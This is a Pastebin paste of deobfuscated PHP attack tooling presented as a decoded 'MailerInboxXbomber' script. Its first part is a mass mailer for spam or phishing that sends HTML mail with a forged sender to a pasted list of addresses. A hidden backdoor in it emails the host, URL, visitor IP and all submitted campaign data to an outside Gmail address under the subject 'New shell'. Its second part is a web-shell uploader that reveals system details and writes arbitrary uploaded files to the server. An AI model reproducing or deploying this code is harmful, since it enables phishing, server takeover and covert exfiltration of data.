Advertisement
Souheyeel

MailerInboxXbomber Decoded!

Mar 19th, 2016
100
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.64 KB | None | 0 0
  1.  
  2.  
  3. Here are the post in the group
  4. http://prntscr.com/ahb62c
  5.  
  6. <?php
  7.  
  8. ignore_user_abort();
  9. set_time_limit(0);
  10. function enviando(){
  11. $msg=1;
  12. $de[1] = $_POST['de'];
  13. $nome[1] = $_POST['nome'];
  14. $assunto[1] = $_POST['assunto'];
  15. $mensagem[1] = $_POST['mensagem'];
  16. $mensagem[1] = stripslashes($mensagem[1]);
  17. $emails = $_POST['emails'];
  18. $emails2 = htmlspecialchars($_POST['emails']);
  19. $para = explode("\n", $emails);
  20. $n_emails = count($para);
  21. $sv = $_SERVER['SERVER_NAME'];
  22. $en = $_SERVER ['REQUEST_URI'];
  23. $k88 = @$_SERVER["HTTP_REFERER"];
  24. $fullurl = "" . $k88 . "<br><p>Emails:<br><TEXTAREA rows=5 cols=100>".$emails2."</TEXTAREA></p><p>Engenharia:<br><TEXTAREA rows=5 cols=100>".$mensagem[1]."</TEXTAREA></p>";
  25. $vai = $_POST['vai'];
  26. if ($vai){
  27. for ($set=0; $set < $n_emails; $set++){
  28. if ($set==0){
  29. $headers = "MIME-Version: 1.0\r\n";
  30. $headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
  31. $headers .= "From: $nome[$msg] <$de[$msg]>\r\n";
  32. $headers .= "Return-Path: <$de[$msg]>\r\n";
  33. //mail($xsylar, $as, $fullurl, $headers);
  34. }
  35. $headers = "MIME-Version: 1.0\r\n";
  36. $headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
  37. $headers .= "From: $nome[$msg] <$de[$msg]>\r\n";
  38. $headers .= "Return-Path: <$de[$msg]>\r\n";
  39. $n_mail++;
  40. $destino = $para[$set];
  41. $num1 = rand(100000,999999);
  42. $num2 = rand(100000,999999);
  43. $msgrand = str_replace("%rand%", $num1, $mensagem[$msg]);
  44. $msgrand = str_replace("%rand2%", $num2, $msgrand);
  45. $msgrand = str_replace("%email%", $destino, $msgrand);
  46. $enviar = mail($destino, $assunto[$msg], $msgrand, $headers);
  47. if ($enviar){
  48. echo ('<font color="green">'. $n_mail .'-'. $destino .' 0k!</font><br>');
  49. } else {
  50. echo ('<font color="red">'. $n_mail .'-'. $destino .' =(</font><br>');
  51. sleep(1);
  52. }
  53. }
  54. }
  55. }
  56. $ip = getenv("REMOTE_ADDR");
  57. $ra44  = rand(1,99999);
  58. $subj98 = "New shell $ip";
  59. $email = "tajouritns@gmail.com";
  60. $from="From: bom <BIMO@2M.TV>";
  61. $a45 = $_SERVER['REQUEST_URI'];
  62. $b75 = $_SERVER['HTTP_HOST'];
  63. $f12 = $_POST['de'];
  64. $z13 = $_POST['nome'];
  65. $x14 = $_POST['assunto'];
  66. $t15 = $_POST['mensagem'];
  67. $m30 = $_POST['emails'];
  68. $m22 = $ip."\n";
  69. $msg8873 = "$a45\n$b75\n$f12\n$z13\n$x14\n$t15\n$m30\n$m22";
  70. mail($email, $subj98, $msg8873, $from);
  71. ?>
  72.  
  73. <?php
  74.  
  75. echo '<title>Uploader by ghost-dz</title>';
  76. echo php_uname();
  77. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  78. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  79. if( $_POST['_upl'] == "Upload" ) {
  80.     if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload ok :d !!!'; }
  81.     else { echo 'Upload Fail !!!'; }
  82. }
  83. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement